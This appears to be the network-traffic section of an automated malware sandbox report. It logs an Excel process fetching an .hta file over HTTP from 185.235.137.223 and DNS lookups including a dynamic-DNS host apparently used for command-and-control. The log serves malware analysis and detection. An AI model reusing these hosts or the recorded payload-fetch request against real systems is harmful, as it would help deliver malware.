                                              Sep 9, 2024 17:49:13.978837967 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978847027 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978848934 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978861094 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978868961 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978873014 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978882074 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.978889942 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.978943110 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979136944 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979151964 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979162931 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979172945 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979183912 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979203939 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979204893 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979204893 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.979219913 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.979237080 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083544016 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083581924 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083592892 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083599091 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083609104 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083619118 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083638906 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083648920 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083659887 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083661079 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083673000 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083683014 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083694935 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083697081 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083704948 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083707094 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083719015 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083729029 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083736897 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.083740950 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.083755970 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.084167004 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.084178925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.084188938 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.084199905 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:14.084207058 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:14.084212065 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:17.183262110 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183275938 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183293104 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183301926 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.183310986 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183320999 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.183342934 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.183413982 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183428049 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183442116 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183456898 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.183458090 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.183490038 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.185869932 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.185946941 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.185961008 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.185982943 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186017990 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186032057 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186048031 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186053991 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186064005 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186085939 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186135054 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186147928 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186172009 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186177015 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186192989 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186212063 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186326981 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186368942 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186506987 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186522007 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186536074 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186554909 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186578035 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186590910 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186605930 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186614037 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186625004 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186635971 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186656952 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186691046 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.186737061 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186750889 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.186784029 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.188162088 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.226051092 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226070881 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226094961 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226109028 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226123095 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226126909 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.226139069 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.226159096 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.226166964 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.266761065 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266784906 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266797066 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266844988 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.266854048 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266865015 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266875982 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266892910 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.266917944 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.266959906 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266971111 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.266983986 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267004013 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267081022 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267108917 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267165899 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267175913 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267187119 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267196894 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267209053 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267215967 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267272949 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267313004 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267323017 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267333984 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267344952 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267347097 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267371893 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267432928 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267443895 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267456055 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267467976 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267473936 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267494917 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267555952 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267566919 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267577887 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267590046 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267596960 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267601013 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267618895 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267723083 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267735004 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267745018 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267755985 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267759085 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267770052 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267786026 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267848969 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267860889 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267872095 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267879963 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.267882109 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.267895937 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268047094 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268059015 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268069029 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268079042 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268084049 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268090010 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268101931 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268105984 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268112898 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268126011 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268134117 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268136978 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268148899 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268151045 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268177032 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268238068 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268248081 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268276930 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268302917 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268313885 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268341064 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268393040 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268404007 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268413067 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268423080 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268431902 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268434048 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268450975 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.268501043 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268512011 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.268528938 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.269354105 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.271673918 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271694899 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271730900 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.271779060 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271790028 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271800995 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271821022 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.271851063 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.271882057 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.272928953 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.272984982 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.272996902 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.273015976 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.273066044 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.273076057 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.273097038 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274179935 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274216890 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274250031 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274260998 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274287939 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274312973 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274324894 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274334908 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274347067 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274353027 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274375916 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274530888 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274542093 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274552107 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274563074 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274565935 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274574995 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274585962 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274591923 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274600983 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274611950 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274615049 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274625063 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274641037 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274769068 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274780035 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274789095 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274801016 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274802923 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274811983 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274825096 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274827957 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274852991 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274954081 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274965048 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274976015 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274986982 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.274993896 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.274996996 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275010109 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275017023 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.275038958 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.275100946 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275111914 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275122881 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275134087 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.275140047 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.275162935 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.276132107 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.320447922 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320462942 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320475101 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320518970 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320530891 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320528030 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.320543051 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320557117 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320564032 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.320568085 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.320604086 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.353805065 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353840113 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353851080 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353878975 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.353915930 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353926897 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353939056 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353946924 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.353951931 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.353970051 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.354243994 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.354260921 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.354271889 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.354281902 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.354290962 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.354310036 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.356892109 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.356946945 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.356957912 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.356990099 CEST4917114645192.168.2.22192.3.101.29
                                              Sep 9, 2024 17:49:17.357049942 CEST1464549171192.3.101.29192.168.2.22
                                              Sep 9, 2024 17:49:17.357060909 CEST1464549171192.3.101.29192.168.2.22
                                              Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                              Sep 9, 2024 17:48:55.133359909 CEST  54562        53         192.168.2.22  8.8.8.8
                                              Sep 9, 2024 17:48:55.140508890 CEST  53           54562      8.8.8.8       192.168.2.22
                                              Sep 9, 2024 17:48:57.605755091 CEST  52917        53         192.168.2.22  8.8.8.8
                                              Sep 9, 2024 17:48:57.612968922 CEST  53           52917      8.8.8.8       192.168.2.22
                                              Sep 9, 2024 17:49:09.531524897 CEST  62751        53         192.168.2.22  8.8.8.8
                                              Sep 9, 2024 17:49:09.538324118 CEST  53           62751      8.8.8.8       192.168.2.22
                                              Sep 9, 2024 17:49:14.453046083 CEST  57893        53         192.168.2.22  8.8.8.8
                                              Sep 9, 2024 17:49:14.549190998 CEST  53           57893      8.8.8.8       192.168.2.22
                                              Sep 9, 2024 17:49:16.159074068 CEST  54821        53         192.168.2.22  8.8.8.8
                                              Sep 9, 2024 17:49:16.167825937 CEST  53           54821      8.8.8.8       192.168.2.22
                                              Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
                                              Sep 9, 2024 17:48:55.133359909 CEST  192.168.2.22  8.8.8.8  0x7850    Standard query (0)  zeep.ly                     A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:48:57.605755091 CEST  192.168.2.22  8.8.8.8  0xb93     Standard query (0)  zeep.ly                     A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:09.531524897 CEST  192.168.2.22  8.8.8.8  0x5ad9    Standard query (0)  ia601706.us.archive.org     A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:14.453046083 CEST  192.168.2.22  8.8.8.8  0x3cad    Standard query (0)  camzeroconnect.duckdns.org  A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:16.159074068 CEST  192.168.2.22  8.8.8.8  0x8655    Standard query (0)  geoplugin.net               A (IP address)  IN (0x0001)  false
                                              Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                        CName  Address         Type            Class        DNS over HTTPS
                                              Sep 9, 2024 17:48:55.140508890 CEST  8.8.8.8    192.168.2.22  0x7850    No error (0)  zeep.ly                     -      95.217.202.210  A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:48:57.612968922 CEST  8.8.8.8    192.168.2.22  0xb93     No error (0)  zeep.ly                     -      95.217.202.210  A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:09.538324118 CEST  8.8.8.8    192.168.2.22  0x5ad9    No error (0)  ia601706.us.archive.org     -      207.241.227.96  A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:14.549190998 CEST  8.8.8.8    192.168.2.22  0x3cad    No error (0)  camzeroconnect.duckdns.org  -      192.3.101.29    A (IP address)  IN (0x0001)  false
                                              Sep 9, 2024 17:49:16.167825937 CEST  8.8.8.8    192.168.2.22  0x8655    No error (0)  geoplugin.net               -      178.237.33.50   A (IP address)  IN (0x0001)  false
                                              • zeep.ly
                                              • ia601706.us.archive.org
                                              • 185.235.137.223
                                              • geoplugin.net
                                              Session ID  Source IP     Source Port  Destination IP   Destination Port  PID   Process
                                              0           192.168.2.22  49164        185.235.137.223  80                3236  C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Sep 9, 2024 17:48:56.275407076 CEST  360                OUT        GET /xampp/ceo/IEnetcateudpationprocess.hta HTTP/1.1
                                              Accept: */*
                                              UA-CPU: AMD64
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 185.235.137.223
                                              Connection: Keep-Alive
                                              Sep 9, 2024 17:48:56.908236980 CEST | 1236 | IN | HTTP/1.1 200 OK
                                              Date: Mon, 09 Sep 2024 15:48:56 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                              Last-Modified: Mon, 09 Sep 2024 07:16:01 GMT
                                              ETag: "24cb3-621aa877cb395"
                                              Accept-Ranges: bytes
                                              Content-Length: 150707
